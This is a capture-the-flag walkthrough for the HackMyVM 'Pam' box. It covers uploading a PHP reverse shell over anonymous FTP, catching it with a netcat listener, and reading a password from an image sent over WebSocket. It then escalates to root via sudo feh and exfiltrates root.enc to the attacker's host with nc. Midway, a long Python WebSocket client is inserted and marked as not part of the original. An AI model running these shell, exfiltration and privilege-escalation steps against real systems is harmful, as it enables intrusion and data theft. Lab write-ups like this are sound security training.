NOTES ABOUT Pam
[ 2022-10-08 ] [ HackMyVM / Pam ]Status: Rooted
Skills: Port Scanning, FTP, Cryptography, Sudo
Tools: nmap, nc, openssl, ftp
PORT SCANNING
$ nmap -v -sS -A -p- 10.0.2.18
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http nginx 1.18.0
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0
GETTING IN
FTP ANONYMOUS LOGIN
SEARCHING WRITABLE DIRS
$ lftp -u anonymous,anonymous -e 'find -l /var/www/html;bye' 10.0.2.18 | grep "d.w..w..w."
drwxrwxrwx 33/33 4096 2022-05-02 17:46:30 /var/www/html/phpipam/app/admin/import-export/upload/
drwxrwxrwx 33/33 4096 2022-05-02 17:46:30 /var/www/html/phpipam/app/subnets/import-subnet/upload/
REVERSE SHELL UPLOAD
ftp> cd /var/www/html/phpipam/app/admin/import-export/upload/
250 Directory successfully changed.
ftp> put rs.php
local: rs.php remote: rs.php
ftp> chmod 777 rs.php
200 SITE CHMOD command ok.
REVERSE SHELL TRIGGER (request it from a browser once the listener below is up):
http://10.0.2.18/phpipam/app/admin/import-export/upload/rs.php
LISTENER (attacker, 10.0.2.15):
$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.18] 43796
Linux pam 5.10.0-17-amd64 #1 SMP Debian 5.10.136-1 (2022-08-13) x86_64 GNU/Linux
21:52:34 up 1:20, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
ELEVATING PRIVILEGES
$ ps -aux
[...]
italia 401 0.0 0.0 2420 524 ? Ss 20:32 0:00 /bin/sh -c /usr/bin/php -q /home/italia/pazz.php
italia 409 0.0 2.6 89000 26360 ? S 20:32 0:00 /usr/bin/php -q /home/italia/pazz.php
[...]
LOCAL PORT SCAN WITH NETCAT
$ nc -zvn 127.0.0.1 1-65535
(UNKNOWN) [127.0.0.1] 46800 (?) open
(UNKNOWN) [127.0.0.1] 12345 (?) open
(UNKNOWN) [127.0.0.1] 3306 (mysql) open
(UNKNOWN) [127.0.0.1] 80 (http) open
(UNKNOWN) [127.0.0.1] 21 (ftp) open
PORT CONNECT
$ nc 127.0.0.1 12345
hi
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Version: 13
Sec-WebSocket-Accept: Kfh9QIsMVZcl6xEPYxPHzW8SZ8w=
[...]
(a 101 upgrade in reply to a bare "hi", with no Sec-WebSocket-Key sent, means the service does not validate the handshake; it is a WebSocket endpoint, so talk to it from a browser or a WebSocket client)
BROWSER WEBSOCKET REPLY (BASE64):
data:image/jpeg;base64,iVBORw0KGgoAAAANSUhEUgAAAu4AAAHUCAIAA[...]
(declared as image/jpeg, but "iVBORw0KGgo" is the base64 of the PNG signature; the browser renders it regardless)
IMAGE TEXT:
rootisCLOSE
-aes-256-cbc
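The port-connect exchange and the base64 reply above, as an added example that is not part of the original write-up: a stdlib-only Python WebSocket client that performs the RFC 6455 client handshake against the local service (host 127.0.0.1, port 12345 and request path "/" are assumed; function names are hypothetical), decodes the server's frames (including fragmented and masked ones) and sniffs the returned data: URL by its magic bytes instead of trusting the declared MIME type. Fed the truncated base64 from the page, it reports that the bytes are a PNG (750x468, 8-bit RGB), not the JPEG the URL claims.

```python
import base64
import hashlib
import os
import socket
import struct

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # fixed handshake GUID from RFC 6455


def ws_accept(client_key: str) -> str:
    """Sec-WebSocket-Accept a conforming server returns for a given Sec-WebSocket-Key."""
    digest = hashlib.sha1((client_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def decode_frame(buf: bytes):
    """Parse one frame from the front of buf -> (fin, opcode, payload, bytes_consumed), or None if incomplete."""
    if len(buf) < 2:
        return None
    fin, opcode = bool(buf[0] & 0x80), buf[0] & 0x0F
    masked, length, pos = bool(buf[1] & 0x80), buf[1] & 0x7F, 2
    if length in (126, 127):                       # extended length: 16-bit or 64-bit big-endian
        size = 2 if length == 126 else 8
        if len(buf) < 2 + size:
            return None
        length, pos = int.from_bytes(buf[2:2 + size], "big"), 2 + size
    mask = b""
    if masked:                                     # servers must not mask; unmask rather than mis-parse
        if len(buf) < pos + 4:
            return None
        mask, pos = buf[pos:pos + 4], pos + 4
    if len(buf) < pos + length:
        return None
    payload = buf[pos:pos + length]
    if mask:
        payload = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
    return fin, opcode, payload, pos + length


# file signatures: what the bytes are, regardless of what the data: URL claims
MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg", b"GIF8": "gif"}


def sniff_data_url(data_url: str) -> dict:
    """Decode a data: URL (a truncated one is fine) and report declared vs actual type, plus PNG geometry."""
    header, b64 = data_url.split(",", 1)
    declared = header[len("data:"):].split(";")[0]
    b64 = b64[: len(b64) - len(b64) % 4]           # drop a trailing partial base64 group
    raw = base64.b64decode(b64)
    actual = next((name for magic, name in MAGIC.items() if raw.startswith(magic)), "unknown")
    info = {"declared": declared, "actual": actual}
    if actual == "png" and len(raw) >= 26 and raw[12:16] == b"IHDR":
        width, height, depth, ctype = struct.unpack(">IIBB", raw[16:26])
        info.update(width=width, height=height, bit_depth=depth, colour_type=ctype)
    return info


def fetch_text_messages(host="127.0.0.1", port=12345, path="/", verify_accept=True, timeout=5.0):
    """Do the RFC 6455 client handshake and yield each complete text message until the peer closes."""
    key = base64.b64encode(os.urandom(16)).decode("ascii")
    request = (f"GET {path} HTTP/1.1\r\nHost: {host}:{port}\r\n"
               "Upgrade: websocket\r\nConnection: Upgrade\r\n"
               f"Sec-WebSocket-Key: {key}\r\nSec-WebSocket-Version: 13\r\n\r\n")
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request.encode("ascii"))
        buf = b""
        while b"\r\n\r\n" not in buf:
            chunk = sock.recv(4096)
            if not chunk:
                raise ConnectionError("closed during handshake")
            buf += chunk
        head, buf = buf.split(b"\r\n\r\n", 1)
        if not head.startswith(b"HTTP/1.1 101"):
            raise ValueError("no upgrade: " + head.decode(errors="replace"))
        if verify_accept and ws_accept(key).encode("ascii") not in head:
            raise ValueError("Sec-WebSocket-Accept does not match our key")
        parts = []
        while True:
            frame = decode_frame(buf)
            if frame is None:                      # need more bytes for a full frame
                chunk = sock.recv(65536)
                if not chunk:
                    return
                buf += chunk
                continue
            fin, opcode, payload, used = frame
            buf = buf[used:]
            if opcode == 0x8:                      # close frame
                return
            if opcode in (0x1, 0x0):               # text or continuation fragment
                parts.append(payload)
                if fin:
                    yield b"".join(parts).decode("utf-8", errors="replace")
                    parts = []


if __name__ == "__main__":
    # The page shows the service answering a bare "hi" with a 101, so it does not
    # check the handshake; skip the accept check rather than abort on its value.
    for text in fetch_text_messages(verify_accept=False):
        if text.startswith("data:image/"):
            print(sniff_data_url(text))
            with open("pazz_image.bin", "wb") as fh:  # hypothetical output file name
                fh.write(base64.b64decode(text.split(",", 1)[1]))
            break
```

Against a conforming server leave verify_accept on so a mismatched Sec-WebSocket-Accept is caught; it is only disabled here because the page shows this service upgrading without a key. The handshake and masked-frame test vectors (key dGhlIHNhbXBsZSBub25jZQ== and the masked "Hello" frame) are the ones given in RFC 6455.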
THE IMAGE SERVED BY italia'S pazz.php GIVES THE PASSWORD:
$ su italia
Password: rootisCLOSE
id
uid=1000(italia) gid=1000(italia) groups=1000(italia),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
$ cd /home/italia
$ cat user.txt
ROOT
$ sudo -l
Matching Defaults entries for italia on pam:
[...]
User italia may run the following commands on pam:
(ALL : ALL) NOPASSWD: /usr/bin/feh
$ man feh
[...]
-A, --action [flag][[title]]action
[...]
The action will be executed by /bin/sh. Use format specifiers to
refer to image info, see FORMAT SPECIFIERS for details. Example
usage: "feh -A "mv %F ~/images/%N" *".
[...]
-u, --unloadable
Don't display images. Just print out their names if imlib2 can
NOT successfully load them. Returns false if at least one image
was loadable.
[...]
$ sudo /usr/bin/feh -uA id
./initrd.img
uid=0(root) gid=0(root) groups=0(root)
(-u runs the action once for every file imlib2 cannot load, here ./initrd.img in the cwd /, so no real image is needed, and since -u is a list mode feh works from the reverse shell without an X display; the action runs as root via /bin/sh)
$ sudo /usr/bin/feh -uA /bin/bash
$ cd /root
$ ls -la
[...]
-rw------- 1 root root 48 Aug 18 11:21 root.enc
[...]
$ cat root.enc
(binary: 8-byte "Salted__" magic, 8-byte salt, then 32 bytes of ciphertext, i.e. two AES blocks)
EXFIL TO THE ATTACKER BOX (start the listener first)
attacker (10.0.2.15):
$ nc -lvnp 443 > root.enc
target:
$ nc 10.0.2.15 443 < root.enc
$ file root.enc
root.enc: openssl enc'd data with salted password
$ openssl enc -aes-256-cbc -d -in root.enc -out root.txt -k rootisCLOSE
(if this ends in "bad decrypt", the key derivation does not match the encrypting side: retry with -md md5, the default before OpenSSL 1.1.0, or with -pbkdf2)
init 0